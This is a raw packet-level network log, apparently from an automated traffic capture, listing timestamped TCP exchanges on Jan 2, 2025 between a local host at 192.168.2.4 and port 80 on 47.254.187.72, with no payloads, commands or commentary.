                                                                            Jan 2, 2025 20:34:53.521650076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521656990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521661043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521672964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521678925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521683931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521693945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521696091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521716118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521733046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521734953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521744013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521754026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521781921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521815062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521852016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521862984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521873951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521891117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521900892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521903038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521915913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521927118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521927118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521940947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521955013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521965981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521970987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.521976948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521987915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.521996021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522015095 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522028923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522039890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522042990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522049904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522059917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522063971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522073984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522080898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522083044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522106886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522121906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522197962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522214890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522226095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522234917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522237062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522250891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522253990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522262096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522270918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522305012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522336006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522346020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522356033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522372961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522380114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522396088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522397041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522406101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522412062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522420883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522449017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522536039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522546053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522556067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522573948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522581100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522583008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522598982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522599936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522609949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522619963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522624016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522630930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522653103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522665024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522665977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522675991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522686005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522694111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.522696972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522715092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.522732973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.524966002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.524981022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.524998903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.525010109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.525019884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.525028944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.525031090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.525041103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.525053024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.525073051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.525091887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.527045012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527059078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527070999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527081013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527087927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.527091980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527101994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527112007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527112007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.527123928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.527146101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.527160883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.530942917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.530965090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.530977011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.530986071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.530996084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.531002998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.531006098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.531018019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.531028986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.531055927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535516024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535550117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535558939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535558939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535578012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535583019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535594940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535598040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535604954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535614014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535615921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535625935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535628080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535636902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535649061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535662889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535676956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535697937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535718918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535729885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535739899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535749912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535763979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535793066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535815001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535825014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535835981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535845041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.535851002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535861969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.535892010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.536837101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536850929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536861897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536885977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536887884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.536895990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536910057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.536917925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536928892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536938906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536938906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.536948919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.536952019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.536984921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.537002087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.537878990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537919044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537929058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537930012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.537939072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537950993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537957907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.537960052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537966013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.537976980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537987947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.537997961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.538000107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.538007975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.538011074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.538043976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608230114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608256102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608268023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608278990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608289957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608306885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608308077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608318090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608329058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608336926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608354092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608364105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608375072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608385086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608388901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608395100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608405113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608416080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608417988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608427048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608432055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608448982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608452082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608458996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608484983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608500957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608510971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608519077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608521938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608550072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608570099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608577013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608582020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608592987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608603001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608617067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608634949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608647108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608649969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608664036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608675003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608685970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608689070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608689070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608699083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608735085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608755112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608767033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608778000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608788013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608797073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608799934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608808994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608815908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608854055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608903885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608915091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608925104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608949900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608954906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608964920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608977079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.608983040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608993053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.608995914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609004021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609005928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609016895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609024048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609061956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609112978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609158039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609184027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609206915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609255075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609266043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609276056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609288931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609296083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609299898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609311104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609327078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609329939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609348059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609364033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609376907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609380960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609391928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609396935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609401941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609412909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609412909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609424114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609442949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609450102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609461069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609461069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609474897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609493017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609513044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609528065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609534979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609545946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.609570980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.609590054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.611783028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611795902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611814976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611826897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611835957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.611838102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611849070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611859083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611870050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.611876965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.611892939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.611910105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.613841057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613862038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613873959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613884926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613895893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613908052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613919020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613929987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.613966942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.614011049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.617779970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617813110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617830038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617841959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617851973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617851973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.617866039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617876053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617887020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.617887020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.617916107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.617930889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.622442007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622457027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622469902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622492075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.622519970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.622581005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622591972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622602940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622613907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622623920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622627974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.622634888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622636080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.622652054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622658014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622663975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.622668028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622679949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622690916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.622692108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.622710943 CET4973080192.168.2.447.254.187.72
